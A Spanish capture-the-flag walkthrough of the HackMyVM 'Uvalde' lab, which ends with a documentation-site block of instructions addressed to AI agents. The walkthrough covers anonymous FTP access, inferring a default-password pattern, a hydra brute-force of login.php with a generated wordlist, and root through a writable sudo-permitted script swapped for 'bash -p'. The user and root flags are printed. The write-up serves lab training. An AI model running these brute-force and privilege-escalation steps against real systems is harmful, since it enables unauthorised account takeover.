# Uvalde HackMyVM (Easy - Linux) ## Escaneo de puertos ```shell nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn ``` ```shell nmap -sCV -p ``` Info: ``` Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-18 03:11 EDT Nmap scan report for 192.168.5.23 Host is up (0.0013s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 1000 1000 5154 Jan 28 2023 output | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.5.4 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 3a:09:a4:da:d7:db:99:ee:a5:51:05:e9:af:e7:08:90 (RSA) | 256 cb:42:6a:be:22:13:2c:f2:57:f9:80:d1:f7:fb:88:5c (ECDSA) |_ 256 44:3c:b4:0f:aa:c3:94:fa:23:15:19:e3:e5:18:56:94 (ED25519) 80/tcp open http Apache httpd 2.4.54 ((Debian)) |_http-title: Agency - Start Bootstrap Theme |_http-server-header: Apache/2.4.54 (Debian) MAC Address: 08:00:27:B4:40:7B (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.82 seconds ``` Veremos un puerto `FTP` y un puerto `80`, si entramos donde se aloja una pagina web en el puerto `80` veremos una pagina web normal y corriente sin nada interesante, vamos a ver si podemos acceder al `FTP` de forma anonima. ```shell ftp anonymous@ ``` Veremos que si nos deja y si listamos veremos lo siguiente: ``` 229 Entering Extended Passive Mode (|||22504|) 150 Here comes the directory listing. drwxr-xr-x 2 0 116 4096 Jan 28 2023 . drwxr-xr-x 2 0 116 4096 Jan 28 2023 .. -rw-r--r-- 1 1000 1000 5154 Jan 28 2023 output 226 Directory send OK. ``` Vamos a descargarnos dicho archivo a ver que continene: ```shell get output ``` Una vez descargado, vamos a leerlo: ``` Script démarré sur 2023-01-28 19:54:05+01:00 [TERM="xterm-256color" TTY="/dev/pts/0" COLUMNS="105" LINES="25"] matthew@debian:~$ id uid=1000(matthew) gid=1000(matthew) groupes=1000(matthew) matthew@debian:~$ ls -al total 32 drwxr-xr-x 4 matthew matthew 4096 28 janv. 19:54 . drwxr-xr-x 3 root root 4096 23 janv. 07:52 .. lrwxrwxrwx 1 root root 9 23 janv. 07:53 .bash_history -> /dev/null -rw-r--r-- 1 matthew matthew 220 23 janv. 07:51 .bash_logout -rw-r--r-- 1 matthew matthew 3526 23 janv. 07:51 .bashrc drwx------ 3 matthew matthew 4096 23 janv. 08:04 .config drwxr-xr-x 3 matthew matthew 4096 23 janv. 08:04 .local -rw-r--r-- 1 matthew matthew 807 23 janv. 07:51 .profile -rw-r--r-- 1 matthew matthew 0 28 janv. 19:54 typescript -rwx------ 1 matthew matthew 33 23 janv. 07:53 user.txt matthew@debian:~$ toilet -f mono12 -F metal hackmyvm.eu ▄▄ ▄▄ ██ ██ ██▄████▄ ▄█████▄ ▄█████▄ ██ ▄██▀ ████▄██▄ ▀██ ███ ██▄ ▄██ ████▄██▄ ██▀ ██ ▀ ▄▄▄██ ██▀ ▀ ██▄██ ██ ██ ██ ██▄ ██ ██ ██ ██ ██ ██ ██ ██ ▄██▀▀▀██ ██ ██▀██▄ ██ ██ ██ ████▀ ▀█▄▄█▀ ██ ██ ██ ██ ██ ██▄▄▄███ ▀██▄▄▄▄█ ██ ▀█▄ ██ ██ ██ ███ ████ ██ ██ ██ ▀▀ ▀▀ ▀▀▀▀ ▀▀ ▀▀▀▀▀ ▀▀ ▀▀▀ ▀▀ ▀▀ ▀▀ ██ ▀▀ ▀▀ ▀▀ ▀▀ ███ ▄████▄ ██ ██ ██▄▄▄▄██ ██ ██ ██▀▀▀▀▀▀ ██ ██ ██ ▀██▄▄▄▄█ ██▄▄▄███ ▀▀ ▀▀▀▀▀ ▀▀▀▀ ▀▀ matthew@debian:~$ exit exit Script terminé sur 2023-01-28 19:54:37+01:00 [COMMAND_EXIT_CODE="0"] ``` Vemos que es un `log` del sistema, pero con esto ya estamos identificando un usuario llamado `matthew`, aunque de momento no veremos nada mas interesante, vamos a realizar un poco de `fuzzing` a ver que encontramos. ## Gobuster ```shell gobuster dir -u http:/// -w -x html,php,txt -t 50 -k -r ``` Info: ``` =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.5.23/ [+] Method: GET [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: php,txt,html [+] Follow Redirect: true [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.php (Status: 403) [Size: 277] /index.php (Status: 200) [Size: 29604] /img (Status: 200) [Size: 1921] /login.php (Status: 200) [Size: 1022] /user.php (Status: 200) [Size: 1022] /mail (Status: 200) [Size: 946] /.html (Status: 403) [Size: 277] /js (Status: 200) [Size: 1575] /success.php (Status: 200) [Size: 1022] /vendor (Status: 200) [Size: 1557] /css (Status: 200) [Size: 1139] /create_account.php (Status: 200) [Size: 1003] /.html (Status: 403) [Size: 277] /.php (Status: 403) [Size: 277] /server-status (Status: 403) [Size: 277] Progress: 882240 / 882244 (100.00%) =============================================================== Finished =============================================================== ``` Veremos varias cosas interesantes, entre ellas este archivo llamado `create_account.php`, vamos a entrar dentro de dicho archivo a ver que nos encontramos. ``` URL = http:///create_account.php ``` Veremos que nos aparecera una campo en el que tendremos que ingresar nuestro nombre, por lo que vamos a poner `test`, una vez echo esto veremos lo siguiente en la pagina: ``` Successful registration ``` Y en la `URL` veremos esto otro: ``` http:///success.php?dXNlcm5hbWU9dGVzdCZwYXNzd29yZD10ZXN0MjAyNUA4OTUy ``` Vemos que se nos genera una cadena codificada en `Base64`, vamos a decodificarla de esta forma: ```shell echo "dXNlcm5hbWU9dGVzdCZwYXNzd29yZD10ZXN0MjAyNUA4OTUy" | base64 -d ``` Info: ``` username=test&password=test2025@8952 ``` Vemos que se ingresa el usuario que nosotros metemos y que despues se genera una contraseña por defecto que te genera la pagina web, por lo que podemos deducir que el usuario `matthew` puede tener dicha contraseña por defecto que te da la web siguiendo esta estructura: ``` usuario + año + @ + num_aleatorio ``` Tambien vemos que el `output` esta en el `2023-01-28` por lo que seguramente el año de la cuenta de la password sea con dicho año, vamos a ponarnos un script que nos genere dicha password con los numeros aleatorios, pero con esa estructura y con ese año. > generate\_dic.py ```python # Generador de diccionario: matthew2023@0000 - matthew2023@9999 with open("diccionario.txt", "w") as f: for i in range(10000): palabra = f"matthew2023@{i:04d}" f.write(palabra + "\n") print("Diccionario generado como diccionario.txt") ``` Ahora si ejecutamos esto: ```shell python3 generate_dic.py ``` Veremos que nos ha generado el diccionario de forma correcta, por lo que vamos a realizar `fuerza bruta` en el archivo de `login.php` mediante `hydra`. ## Escalate user matthew ### Hydra ```shell hydra -l matthew -P diccionario.txt http-post-form "/login.php:username=^USER^&password=^PASS^:S=302" ``` Info: ``` Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-18 03:32:56 [DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:1/p:10000), ~625 tries per task [DATA] attacking http-post-form://192.168.5.23:80/login.php:username=^USER^&password=^PASS^:S=302 [80][http-post-form] host: 192.168.5.23 login: matthew password: matthew2023@1554 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-18 03:33:24 ``` Veremos que hemos obtenido las credenciales de dicho usuario, ahora si las probamos en el `login.php`, veremos que si nos deja, pero no veremos gran cosa, por lo que vamos a probarlas por `SSH` a ver si funcionan. ### SSH ```shell ssh matthew@ ``` Metemos como contraseña `matthew2023@1554` y veremos que estamos dentro, por lo que leeremos la `flag` del usuario. > user.txt ``` 6e4136fbed8f8c691996dbf42697d460 ``` ## Escalate Privileges SI hacemos `sudo -l` veremos lo siguiente: ``` Matching Defaults entries for matthew on uvalde: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User matthew may run the following commands on uvalde: (ALL : ALL) NOPASSWD: /bin/bash /opt/superhack ``` Veremos que podremos ejecutar `bash` junto con el script `superhack` como el usuario `root`, por lo que vamos a investigar dicho script. Si leemos el script, veremos lo siguiente: ```bash #! /bin/bash clear -x GRAS=$(tput bold) JAUNE=$(tput setaf 3)$GRAS BLANC=$(tput setaf 7)$GRAS BLEU=$(tput setaf 4)$GRAS VERT=$(tput setaf 2)$GRAS ROUGE=$(tput setaf 1)$GRAS RESET=$(tput sgr0) cat << EOL _______ __ __ _______ _______ ______ __ __ _______ _______ ___ _ | || | | || || || _ | | | | || _ || || | | | | _____|| | | || _ || ___|| | || | |_| || |_| || || |_| | | |_____ | |_| || |_| || |___ | |_||_ | || || || _| |_____ || || ___|| ___|| __ || || || _|| |_ _____| || || | | |___ | | | || _ || _ || |_ | _ | |_______||_______||___| |_______||___| |_||__| |__||__| |__||_______||___| |_| EOL printf "${BLANC}Tool:${RESET} ${BLEU}superHack${RESET}\n" printf "${BLANC}Author:${RESET} ${BLEU}hackerman${RESET}\n" printf "${BLANC}Version:${RESET} ${BLEU}1.0${RESET}\n" printf "\n" [[ $# -ne 0 ]] && echo -e "${BLEU}Usage:${RESET} $0 domain" && exit while [ -z "$domain" ]; do read -p "${VERT}domain to hack:${RESET} " domain done printf "\n" n=50 string="" for ((i=0; i<$n; i++)) do string+="." done for ((i=0; i<$n; i++)) do string="${string/./#}" printf "${BLANC}Hacking progress...:${RESET} ${BLANC}[$string]${RESET}\r" sleep .09 done printf "\n" printf "${JAUNE}Target $domain ====> PWNED${RESET}\n" printf "${JAUNE}URL: https://$domain/*********************.php${RESET}\n" echo -e "\n${ROUGE}Pay 0.000047 BTC to 3FZbgi29cpjq2GjdwV8eyHuJJnkLtktZc5 to unlock backdoor.${RESET}\n" ``` Pero no veremos nada interesante, ahora si listamos la carpeta `/opt` veremos esto: ``` drwx---rwx 2 root root 4096 Feb 5 2023 . drwxr-xr-x 18 root root 4096 Jan 22 2023 .. -rw-r--r-- 1 root root 1594 Jan 31 2023 superhack ``` Vemos que el archivo esta dentro del `/opt` con estos permisos: ``` drwx---rwx ``` Por lo que podremos hacer una cosa con dicho archivo: ```shell mv superhack superhack_old nano superhack #Dentro del nano #!/bin/bash bash -p ``` Lo guardamos y le establecemos permisos de ejecuccion. ```shell chmod +x superhack ``` Ahora si lo ejecutamos de esta forma: ```shell sudo bash /opt/superhack ``` Info: ``` root@uvalde:/opt# whoami root ``` Veremos que seremos `root` por lo que leeremos la `flag` de `root`. > root.txt ``` 59ec54537e98a53691f33e81500f56da ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://dise0.gitbook.io/h4cker_b00k/ctf/hackmyvm/uvalde-hackmyvm-easy-linux.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.